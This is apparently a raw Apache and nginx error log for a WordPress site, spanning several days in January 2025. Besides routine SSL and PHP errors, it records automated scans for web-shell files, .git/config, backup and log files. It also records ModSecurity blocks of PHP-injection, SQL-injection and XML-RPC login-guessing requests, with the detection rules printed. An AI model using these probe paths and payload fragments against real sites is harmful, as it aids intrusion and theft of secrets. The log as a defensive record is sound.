(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Wed Jan 08 18:15:51.102591 2025] [:error] [pid 2054:tid 140553953937152] [client 108.165.243.185:36066] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Jan 08 18:15:53.232679 2025] [autoindex:error] [pid 2054:tid 140554079827712] [client 108.165.243.185:36074] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Wed Jan 08 18:16:10.437710 2025] [:error] [pid 2623:tid 140553979115264] [client 108.165.243.185:36108] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jan 08 18:16:28.511150 2025] [:error] [pid 2623:tid 140553995900672] [client 108.165.243.185:36164] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Wed Jan 08 18:16:44.346336 2025] [autoindex:error] [pid 2054:tid 140553920366336] [client 108.165.243.185:36192] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Wed Jan 08 18:17:29.603802 2025] [:error] [pid 2054:tid 140554071435008] [client 108.165.243.185:36276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jan 08 19:03:35.126647 2025] [ssl:warn] [pid 2035:tid 140554333816704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 20:44:09.290077 2025] [:error] [pid 3384:tid 140554037864192] [client 45.55.68.16:38560] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Wed Jan 08 20:44:09.290167 2025] [:error] [pid 3384:tid 140554037864192] [client 45.55.68.16:38560] Stack trace: [Wed Jan 08 20:44:09.290193 2025] [:error] [pid 3384:tid 140554037864192] [client 45.55.68.16:38560] #0 {main} [Wed Jan 08 20:44:09.290281 2025] [:error] [pid 3384:tid 140554037864192] [client 45.55.68.16:38560] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Thu Jan 09 03:33:43.112601 2025] [ssl:warn] [pid 26273:tid 140607318370176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 03:33:43.324384 2025] [ssl:warn] [pid 26274:tid 140607318370176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 03:33:43.876728 2025] [ssl:warn] [pid 26274:tid 140607318370176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 03:33:46.429634 2025] [ssl:warn] [pid 26274:tid 140607318370176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 03:33:48.748137 2025] [ssl:warn] [pid 26689:tid 139868639188864] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 03:33:48.953046 2025] [ssl:warn] [pid 26690:tid 139868639188864] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 06:29:45.091125 2025] [:error] [pid 27252:tid 139868252350208] [client 150.136.112.62:49052] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Jan 09 06:29:58.283374 2025] [:error] [pid 26713:tid 139868361455360] [client 150.136.112.62:49088] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jan 09 06:29:58.292531 2025] [:error] [pid 26710:tid 139868361455360] [client 150.136.112.62:49090] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jan 09 06:30:38.066955 2025] [autoindex:error] [pid 26710:tid 139868201993984] [client 150.136.112.62:49182] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 09 06:30:46.877107 2025] [:error] [pid 26712:tid 139868319491840] [client 150.136.112.62:49204] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jan 09 06:30:47.641180 2025] [autoindex:error] [pid 26713:tid 139868185208576] [client 150.136.112.62:49208] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 09 06:30:48.643525 2025] [autoindex:error] [pid 26712:tid 139868439656192] [client 150.136.112.62:49212] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 09 06:30:54.497005 2025] [:error] [pid 26713:tid 139868344669952] [client 150.136.112.62:49232] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jan 09 06:30:54.506590 2025] [:error] [pid 26710:tid 139868243957504] [client 150.136.112.62:49234] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jan 09 06:31:39.661735 2025] [:error] [pid 27252:tid 139868353062656] [client 150.136.112.62:49356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Jan 09 06:31:53.557927 2025] [:error] [pid 27252:tid 139868260742912] [client 150.136.112.62:49398] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jan 09 06:31:53.567016 2025] [:error] [pid 26712:tid 139868285921024] [client 150.136.112.62:49400] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jan 09 06:32:30.306758 2025] [autoindex:error] [pid 26713:tid 139868193601280] [client 150.136.112.62:49510] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 09 06:32:39.629958 2025] [:error] [pid 26712:tid 139868235564800] [client 150.136.112.62:49534] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Jan 09 06:32:40.510454 2025] [autoindex:error] [pid 27252:tid 139868327884544] [client 150.136.112.62:49538] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 09 06:32:41.293168 2025] [autoindex:error] [pid 27252:tid 139868294313728] [client 150.136.112.62:49542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jan 09 06:32:45.708806 2025] [:error] [pid 27252:tid 139868336277248] [client 150.136.112.62:49558] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jan 09 06:32:45.724733 2025] [:error] [pid 26713:tid 139868260742912] [client 150.136.112.62:49560] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Jan 09 10:18:37.057101 2025] [:error] [pid 27252:tid 139868243957504] [client 163.5.241.19:54192] [client 163.5.241.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z3_ozVW4Y-GjLd1MzJ7G1wAAANE"] [Thu Jan 09 19:04:10.468444 2025] [ssl:warn] [pid 26690:tid 139868639188864] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 09 22:04:25.422082 2025] [:error] [pid 17412:tid 139868336277248] [client 45.157.52.23:40412] [client 45.157.52.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:14[208]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseven/index.php"] [unique_id "Z4COOUkPmoLDBJJlGBbH_wAAAAY"] [Thu Jan 09 22:04:26.837410 2025] [:error] [pid 17413:tid 139868456441600] [client 45.157.52.23:40414] [client 45.157.52.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:14[208]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Z4COOrTvwb6WS91_9pRzPQAAAEA"] [Thu Jan 09 23:06:54.014744 2025] [authz_core:error] [pid 17414:tid 139868311099136] [client 206.81.24.74:41004] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/09 23:06:58 [error] 17346#17346: *322841 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 10 02:08:45.791118 2025] [:error] [pid 17414:tid 139868269135616] [client 163.5.241.29:43744] [client 163.5.241.29] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z4DHfWtDXrTg-HpDVi87rgAAAI4"] [Fri Jan 10 03:25:51.742929 2025] [authz_core:error] [pid 17413:tid 139868235564800] [client 159.89.12.166:46216] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/10 03:25:56 [error] 17347#17347: *325505 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jan 10 03:26:41.842654 2025] [ssl:warn] [pid 7445:tid 139882034608000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 10 03:26:42.168367 2025] [ssl:warn] [pid 7446:tid 139882034608000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 10 03:26:42.748904 2025] [ssl:warn] [pid 7446:tid 139882034608000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 10 03:26:45.067406 2025] [ssl:warn] [pid 7446:tid 139882034608000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 10 03:26:47.344876 2025] [ssl:warn] [pid 7865:tid 140213262714752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 10 03:26:47.549109 2025] [ssl:warn] [pid 7866:tid 140213262714752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 10 05:16:13.568253 2025] [autoindex:error] [pid 8446:tid 140213079967488] [client 68.183.84.198:47862] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 10 16:59:39.506624 2025] [autoindex:error] [pid 22932:tid 140212906723072] [client 4.213.177.84:35768] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jan 10 17:29:56.512461 2025] [:error] [pid 8446:tid 140213079967488] [client 193.41.206.36:36360] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z4GfZIfftXFaTXYyjD5umAAAAMA"] [Fri Jan 10 17:38:22.816457 2025] [:error] [pid 7888:tid 140213054789376] [client 193.41.206.36:36678] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z4GhXkDHjmPrJOate2sMpAAAAAM"] [Fri Jan 10 21:18:29.315811 2025] [:error] [pid 22932:tid 140212856366848] [client 181.45.195.149:42148] [client 181.45.195.149] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/admin.php"] [unique_id "Z4HU9VFDdCwZky7JiMhdYQAAARI"] [Fri Jan 10 21:20:27.534152 2025] [:error] [pid 22932:tid 140212923508480] [client 181.45.195.149:42162] [client 181.45.195.149] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z4HVa1FDdCwZky7JiMhdZAAAAQo"] 2025/01/11 01:53:17 [error] 7763#7763: *341971 access forbidden by rule, client: 13.40.43.30, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/11 01:55:40 [error] 7763#7763: *341984 access forbidden by rule, client: 3.9.17.251, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/11 02:05:54 [error] 7763#7763: *342022 access forbidden by rule, client: 3.8.91.138, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/11 02:18:36 [error] 7762#7762: *342063 access forbidden by rule, client: 3.10.152.28, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sat Jan 11 03:27:49.708976 2025] [ssl:warn] [pid 28268:tid 140642895943552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 11 03:27:50.124944 2025] [ssl:warn] [pid 28270:tid 140642895943552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 11 03:27:50.943908 2025] [ssl:warn] [pid 28270:tid 140642895943552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 11 03:27:53.056948 2025] [ssl:warn] [pid 28270:tid 140642895943552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 11 03:27:55.292648 2025] [ssl:warn] [pid 28691:tid 140673499404160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 11 03:27:55.558340 2025] [ssl:warn] [pid 28692:tid 140673499404160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 11 19:36:23.739349 2025] [autoindex:error] [pid 28708:tid 140673181275904] [client 52.172.205.5:35008] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jan 11 23:45:27.332756 2025] [authz_core:error] [pid 28709:tid 140673105741568] [client 206.81.12.187:37828] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/11 23:45:30 [error] 28672#28672: *354592 access forbidden by rule, client: 206.81.12.187, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jan 12 00:14:42.840163 2025] [:error] [pid 28708:tid 140673063778048] [client 45.157.52.23:38120] [client 45.157.52.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: && found within XML: \\x0awp.getUsersBlogs\\x0a\\x0a \\x0a \\x0a administratoir\\x0a \\x0a \\x0a \\x0a \\x0a fibcmj806&&\\x0a \\x0a \\x0a\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z4NPwvhJc1LVK_nHu2PLBgAAAFY"] [Sun Jan 12 01:44:06.268701 2025] [authz_core:error] [pid 28708:tid 140673181275904] [client 64.225.75.246:40108] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/12 01:44:10 [error] 28672#28672: *355494 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jan 12 03:12:38.123588 2025] [ssl:warn] [pid 4962:tid 139908256704384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 12 03:12:38.335657 2025] [ssl:warn] [pid 4964:tid 139908256704384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 12 03:12:38.899371 2025] [ssl:warn] [pid 4964:tid 139908256704384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 12 03:12:42.056732 2025] [ssl:warn] [pid 4964:tid 139908256704384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 12 03:12:44.398934 2025] [ssl:warn] [pid 5379:tid 140503234422656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 12 03:12:44.595487 2025] [ssl:warn] [pid 5380:tid 140503234422656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 12 03:12:45.737872 2025] [ssl:warn] [pid 5380:tid 140503234422656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 03:08:40.830764 2025] [ssl:warn] [pid 13963:tid 140409894160256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 03:08:41.145980 2025] [ssl:warn] [pid 13964:tid 140409894160256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 03:08:41.704706 2025] [ssl:warn] [pid 13964:tid 140409894160256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 03:08:44.637881 2025] [ssl:warn] [pid 13964:tid 140409894160256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 03:08:46.891783 2025] [ssl:warn] [pid 14379:tid 140403621775232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 03:08:47.083009 2025] [ssl:warn] [pid 14380:tid 140403621775232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 13 09:56:08.052493 2025] [:error] [pid 14397:tid 140403177072384] [client 129.213.94.27:38646] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Jan 13 09:56:20.530014 2025] [:error] [pid 14399:tid 140403260999424] [client 129.213.94.27:38678] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jan 13 09:56:20.550269 2025] [:error] [pid 14398:tid 140403252606720] [client 129.213.94.27:38680] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jan 13 09:56:58.189965 2025] [autoindex:error] [pid 14398:tid 140403430635264] [client 129.213.94.27:38780] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jan 13 09:57:06.925072 2025] [:error] [pid 14991:tid 140403311355648] 